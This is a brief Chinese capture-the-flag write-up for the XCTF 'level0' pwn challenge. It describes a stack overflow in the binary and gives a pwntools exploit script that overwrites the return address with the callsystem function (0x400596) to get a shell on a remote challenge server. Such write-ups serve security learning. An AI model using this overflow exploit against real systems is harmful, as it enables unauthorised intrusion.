level0攻防世界pwn

checksec然后试运行


放入64位IDA,F5大法



典型栈溢出

发现callsystem函数


找到callsystem的地址,是0x400596


写脚本

#coding=utf8
from pwn import *
context.log_level = 'debug'
p = remote('111.198.29.45',48379)


payload = ''
payload += 0x80*'A'
payload += p64(0)
payload += p64(0x400596)

p.sendline(payload)
p.interactive()
成功
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容